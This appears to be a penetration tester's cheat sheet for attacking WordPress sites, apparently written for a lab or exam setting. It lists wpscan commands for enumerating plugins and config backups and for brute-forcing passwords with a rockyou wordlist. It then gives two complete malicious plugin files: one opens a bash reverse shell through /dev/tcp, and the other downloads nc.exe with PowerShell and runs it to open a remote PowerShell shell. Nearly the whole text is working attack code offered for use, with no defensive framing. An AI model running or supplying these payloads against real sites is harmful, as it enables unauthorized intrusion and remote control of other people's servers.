wpscan --url $url
wpscan --url $url -e vp <- Vulnerable plugins
wpscan --url $url -e cb <- Config backups
wpscan --url $url -e p --plugins-detection aggressive
wpscan --url $url -U users.txt -P ~/rockyou.txt
You can also catch a reverse shell by editing Appearance > Editor > index.php
<?php
/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.214/1337 0>&1'");
?>
<?php
/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/
system("powershell -c curl http://192.168.45.239/nc.exe -o C:\\programdata\\nc.exe");
system("C:\\programdata\\nc.exe 192.168.45.239 1337 -e powershell.exe");
?>
